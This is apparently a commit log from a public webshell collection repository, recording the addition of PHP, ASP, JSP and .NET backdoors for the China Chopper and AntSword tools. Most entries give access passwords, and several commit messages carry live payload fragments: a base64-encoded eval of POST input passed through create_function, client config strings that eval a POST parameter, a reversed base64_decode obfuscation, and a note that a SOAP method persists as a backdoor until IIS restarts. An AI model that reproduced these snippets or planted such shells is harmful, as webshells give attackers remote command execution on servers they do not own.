tennc
|
db0431a444
|
Create bypass01.php
password : mima
|
2016-08-09 12:16:20 +08:00 |
|
tennc
|
4381ded7c0
|
Update README.md
|
2016-08-09 12:13:57 +08:00 |
|
tennc
|
4d0f1af08f
|
Update README.md
|
2016-08-09 12:13:00 +08:00 |
|
tennc
|
a07381c3f1
|
Create m7lrv01.php
|
2016-08-09 12:09:04 +08:00 |
|
tennc
|
c0cb6d364b
|
Create w02.php
from : http://zone.wooyun.org/content/28453
|
2016-07-16 17:58:14 +08:00 |
|
tennc
|
88ad3b335a
|
Create w01.php
from : http://zone.wooyun.org/content/28453
|
2016-07-16 17:53:22 +08:00 |
|
tennc
|
3cad6fdf09
|
Create w03.asp
password:abcd
|
2016-06-02 16:37:20 +08:00 |
|
tennc
|
a7d3af2049
|
Create w02.asp
password:-116679704
|
2016-06-02 16:23:06 +08:00 |
|
tennc
|
8b3b5d0a20
|
Create w01.asp
password : hxg
|
2016-06-02 16:22:13 +08:00 |
|
tennc
|
0871e1a18c
|
Create tie01.asp
password:aaa
|
2016-06-01 16:58:00 +08:00 |
|
tennc
|
37a8044d11
|
Create qun01.php
usage: caidao config with
```
<O>tongji=QGV2YWwoJF9QT1NUWzBdKTs=</O>
```
password:0
or edit antSword source code demo: http://zone.wooyun.org/content/27230
|
2016-06-01 16:49:30 +08:00 |
|
tennc
|
6ce74b0f3d
|
Create w03.jsp
|
2016-05-29 09:28:27 +08:00 |
|
tennc
|
486f74dfb5
|
Create w.jspx
|
2016-05-29 09:28:02 +08:00 |
|
tennc
|
4db274efc3
|
Create w02.jsp
|
2016-05-29 09:27:34 +08:00 |
|
tennc
|
b09d2eadcc
|
Create w_2016-05-25.php
usage : shell.php?x=1 password "x"
or shell.php password "x"
|
2016-05-25 10:06:56 +08:00 |
|
Medicean
|
8bcd40d1af
|
删除原蚁剑 jsp shell, 添加中国蚁剑 shell 目录及多个 shell
|
2016-04-16 02:19:29 +08:00 |
|
tennc
|
db87aa1609
|
add shell_ant.jsp @antoor 👍
password : ant
author: antoor
|
2016-04-05 14:23:57 +08:00 |
|
tennc
|
6c6fd08281
|
add caidao shell for jsp
passowrd: yunyan
|
2016-04-05 14:21:25 +08:00 |
|
tennc
|
aa46988557
|
Create Customize.soap
from : zone.wooyun.org
author : RedFree
1、.soap文件只有放在web根目录时才能顺利调用,放到子目录中会报错!
这个错误我并未解决,且待更深入的学习吧。。。
2、.soap调用一次后,即便把这个文件删除,方法依然存在且可调用,除非重启IIS!(很好的后门咩)
3、针对不同的.NET版本,以上代码有可能报错,可自行修改。
4、因无法搞定GET/POST传参的异常,如果要使用菜刀去连接,你需要写一个简单的中转脚本。
|
2016-04-05 12:42:19 +08:00 |
|
tennc
|
43a5e624c8
|
add cutstomize.asp
author: RedFree
form : zone.wooyun.org
password : z
choice : cutstomize
|
2016-03-16 13:14:22 +08:00 |
|
tennc
|
6d480c737d
|
Create z-2016-01-05.php
password: z
from : zone.wooyun.org
|
2016-01-05 20:53:06 +08:00 |
|
tennc
|
242e1db98b
|
Create sqzr.php
password: sqzr
caidao shell
$mpy = create_function('', base64_decode("IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=")); $mpy();
|
2015-12-25 14:04:47 +08:00 |
|
tennc
|
0d5688e8eb
|
add w-ob_start02.php
author : isno
from : wooyun.org
success running PHP5.3.3 >=
|
2015-10-29 20:30:34 +08:00 |
|
tennc
|
e046b28382
|
add w-ob_start01.php
from : wooyun.org
author : isno
|
2015-10-29 20:28:44 +08:00 |
|
tennc
|
89262988cd
|
Update short_shell.md
|
2015-10-19 23:48:43 +08:00 |
|
tennc
|
e9646d4cc8
|
Create short_shell.md
from : zone.wooyun.com
author : RedFree
|
2015-10-19 23:45:30 +08:00 |
|
tennc
|
24681c74a6
|
Delete wl168168.php
it running error
|
2015-07-23 16:25:46 +08:00 |
|
tennc
|
b14ecbafe6
|
Create w.jsp
from : zone.wooyun.org
|
2015-07-22 08:08:10 +08:00 |
|
tennc
|
baa5b59dee
|
Create w.php
usage:
url : xxxxxx/xxx.php
pwd : cmd
<O>43cb006424cbf7b46dbca36c8ed79b69=eval($_POST['cmd'])</O>
from : zone.wooyun.org 21720
|
2015-07-18 16:17:50 +08:00 |
|
tennc
|
171b8329ec
|
Create p.php
password: h
from: zone.wooyun.org
|
2015-07-11 08:23:00 +08:00 |
|
tennc
|
a9006118fb
|
Create a.asp
passwd : h
from : zone.wooyun.org
|
2015-07-11 08:22:25 +08:00 |
|
tennc
|
f020e05ac8
|
Create x.php
usage:
<O>0K=123456&qwer=edoced_46esab</O>
password : write anything
使用方法:
菜刀配置里填写: <O>0K=123456&qwer=edoced_46esab</O>
密码:任意
from : zone.wooyun.org
|
2015-07-09 13:53:28 +08:00 |
|
tennc
|
fe87858978
|
Create 3802.php
usage : post ????
from : zone.wooyun.org
|
2015-06-30 08:32:05 +08:00 |
|
tennc
|
ce0c2b5724
|
Update README.md
|
2015-06-30 08:30:25 +08:00 |
|
tennc
|
3a19f1838c
|
Create wl168168.php
password : wl168168
from : zone.wooyun.org
|
2015-06-30 08:24:55 +08:00 |
|
tennc
|
d3add3debf
|
add customize.asmx 👍
author : RedFree
image : http://static.wooyun.org/upload/image/201506/2015062216544536916.jpg
|
2015-06-22 17:08:29 +08:00 |
|
tennc
|
bdaf24523d
|
Create customize.ashx
author : RedFree
from : zone.wooyun.org
[img](http://static.wooyun.org/upload/image/201506/2015061503204267627.jpg)
|
2015-06-15 08:34:58 +08:00 |
|
tennc
|
32e2ca2aa5
|
Update 强悍.php
|
2014-12-29 10:35:06 +08:00 |
|
tennc
|
170c6ea7ab
|
add caidao plug and update caidao readme.md
|
2014-11-04 11:29:23 +08:00 |
|
tennc
|
70090b4682
|
Update README.md
|
2013-12-31 11:10:53 +08:00 |
|
tennc
|
1f31c4715d
|
update caidao-shell
redirect.asp for caidao
|
2013-11-20 10:36:42 +08:00 |
|
tennc
|
f9972ec67d
|
uodate
|
2013-05-28 11:06:59 +08:00 |
|
tennc
|
cc7095e2ef
|
update caidao-shell
|
2013-05-24 10:43:57 +08:00 |
|
tennc
|
70af4eb3fe
|
update caidao-shell
|
2013-05-24 10:40:56 +08:00 |
|
tennc
|
ddfe7283a1
|
update caidao-shell
|
2013-05-24 10:29:06 +08:00 |
|
tennc
|
ed55c50f51
|
Rename README to README.md
|
2013-05-24 08:31:50 +08:00 |
|
tennc
|
6cebda8030
|
Create README
|
2013-05-24 08:28:06 +08:00 |
|
tennc
|
733618bc2a
|
update webshell Penetration testing2013 beta
|
2013-05-24 08:23:49 +08:00 |
|